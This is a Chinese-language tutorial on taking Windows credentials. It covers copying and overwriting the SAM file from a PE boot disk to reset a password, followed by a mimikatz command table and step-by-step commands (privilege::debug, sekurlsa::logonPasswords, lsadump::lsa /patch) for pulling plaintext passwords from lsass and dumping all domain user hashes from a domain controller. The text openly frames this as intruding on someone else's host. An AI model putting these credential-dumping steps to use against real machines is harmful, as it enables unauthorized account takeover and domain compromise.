基于SAM文件的密码破解
SAM文件即账号密码数据库文件。 当我们登录系统的时候,系统会自动地和 C:\Windows\System32\config\SAM 中的SAM文件自动校对,如发现此次密码与SAM文件中的加密数据符合时,你就会顺利登录;如果错误则无法登录。在系统运行期间,SAM文件一直是被占用的,是无法打开和编辑复制的,我们可以进入PE系统进行复制然后在利用软件进行密码的修改
U盘启动,运行DiskGenius分区工具
找到 SAM 文件,复制到U盘
在另一台电脑上下载软件 NTPWedit 并运行,打开 SAM 文件,解锁并修改密码,然后把 SAM 文件复制到原来的电脑上,覆盖原文件。或者我们可以直接利用工具(一般的启动盘PE中都有密码重置功能)一键重置。但是这样就完美的暴露了我们入侵了对方的主机
注意:这样只能修改密码,并不能知道密码的明文
Mimikatz是个啥?
mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!
注意:mimikatz的使用需要administrator权限,否则会提权失败。
mimikatz基础命令
| • cls | 清屏 |
|---|---|
| • exit | 退出 |
| • version | 查看mimikatz的版本 |
| • system::user | 查看当前登录的系统用户 |
| • system::computer | 查看计算机名称 |
| • process::list | 列出进程 |
| • process::suspend 进程名称 | 暂停进程 |
| • process::stop 进程名称 | 结束进程 |
| • process::modules | 列出系统的核心模块及所在位置 |
| • service::list | 列出系统的服务 |
| • service::remove | 移除系统的服务 |
| • service::start stop 服务名称 | 启动或停止服务 |
| • privilege::list | 列出权限列表 |
| • privilege::enable | 激活一个或多个权限 |
| • privilege::debug | 提升权限 |
| • nogpo::cmd | 打开系统的cmd.exe |
| • nogpo::regedit | 打开系统的注册表 |
| • nogpo::taskmgr | 打开任务管理器 |
| • ts::sessions | 显示当前的会话 |
| • ts::processes | 显示进程和对应的pid情况等 |
| • sekurlsa::wdigest | 获取本地用户信息及密码 |
| • sekurlsa::tspkg | 获取tspkg用户信息及密码 |
| • sekurlsa::logonPasswords | 获登陆用户信息及密码 |
抓取windows密码
操作很简单,两步搞定
首先需要提权:privilege::debug
然后抓取明文密码:sekurlsa::logonPasswords
使用mimikatz读取域控上所有域用户的hash值
第一步依然是提升权限:privilege::debug
第二步抓取密码:lsadump::lsa /patch
582
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
